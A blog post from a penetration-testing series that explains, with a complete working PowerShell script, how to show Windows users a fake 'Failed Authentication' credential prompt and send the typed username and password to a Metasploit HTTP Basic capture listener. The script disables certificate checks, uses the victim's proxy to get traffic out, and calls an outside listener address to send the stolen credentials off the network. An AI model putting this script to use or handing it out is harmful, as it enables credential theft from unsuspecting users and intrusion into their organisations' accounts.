Powershell Popups + Capture

Cross-posted from: https://www.room362.com/blog/2015/01/12/powershell-popups-plus-capture/

Metasploit Minute has entered its 3rd "season", and we kick it off by using the Metasploit capture modules to capture creds from this PowerShell popup. The cool thing about this is that you can leave it executing on a system without any other code on disk and get creds constantly, as any level of user. No admin, no UAC bypass needed. Just a bunch of creds for free, over SSL. ;-)

Here is the code:

https://gist.github.com/mubix/b0fee7ba02ba8a225125

Let's break down the code from the gist line by line:

1. Prompt Windows for credentials, with the caption "Failed Authentication", no message text (so the default is used), and the current username and domain pre-filled in the box to add authenticity. That's where all the magic is; everything else is just gravy.

2. Tell PowerShell not to verify SSL certificates, which lets us use a self-signed cert on the HTTPS listener later. Note that this setting is process-wide for the PowerShell session, not per request.

3. Create a new WebClient object.

4. Tell PowerShell to use whatever proxy the current user uses, with whatever credentials they have cached. If one or both are unnecessary, the settings are simply ignored.

5. Tell PowerShell that the HTTP Basic credentials to use are the ones the user just typed into the popup box.

6. Finally, make the request to the HTTP Basic capture module in Metasploit (auxiliary/server/capture/http_basic with SSL enabled). Anything that speaks HTTP Basic auth could capture these creds just as well.
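The following is an added example that reconstructs the six steps above in working PowerShell. It is not the gist's code; the listener address (192.0.2.10, a documentation range) is an assumption, and it adds two things the walkthrough does not mention: a check for the user pressing Cancel, and a try/catch around the request so the script does not spray an error dialog on the target when the listener answers with a 401.

```powershell
# Added example reconstructing the technique described above; not the original gist.
# Assumption: a Metasploit http_basic capture listener with SSL enabled at this address.
$listener = 'https://192.0.2.10:443/'

# 1. Credential prompt. Caption "Failed Authentication", empty message (host default),
#    DOMAIN\user pre-filled so the box looks like a genuine re-authentication request.
$user = [Environment]::UserDomainName + '\' + [Environment]::UserName
$cred = $host.UI.PromptForCredential('Failed Authentication', '', $user, [Environment]::UserDomainName)

# Cancel returns $null. Bail out rather than sending an empty Authorization header;
# the "constant creds" variant simply wraps everything below in a loop that re-prompts.
if ($null -eq $cred) { return }

# 2. Accept any server certificate so a self-signed listener cert works.
#    This callback is process-wide for the session, not per request.
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }

# 3. WebClient does the HTTP work.
$wc = New-Object System.Net.WebClient

# 4. Use the user's configured proxy with their cached proxy credentials, so the
#    request leaves the network the same way the browser's traffic does. With no
#    proxy configured these settings have no effect.
$wc.Proxy = [System.Net.WebRequest]::DefaultWebProxy
$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials

# 5. Hand the typed credentials to WebClient. A PSCredential is not an ICredentials,
#    so convert it to a NetworkCredential; DOMAIN\user is split into Domain and
#    UserName and rejoined by the Basic client, so the domain survives.
$wc.Credentials = $cred.GetNetworkCredential()

# 6. One GET. The listener answers 401 with "WWW-Authenticate: Basic realm=...",
#    WebClient retries with "Authorization: Basic base64(DOMAIN\user:password)", and
#    the capture module logs it. Whatever comes back after that is irrelevant.
try {
    $null = $wc.DownloadString($listener)
} catch [System.Net.WebException] {
    # Expected: the listener has no real content to serve once it has the creds.
}
```

Because WebClient only sends Basic credentials in response to a 401 challenge, the listener must actually issue one; the Metasploit capture module does, which is why the request can be a plain GET with no hand-built Authorization header.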

Then execute it. The target sees the credential prompt, and as soon as they fill it in, the username and password show up in the Metasploit console.

Game over!
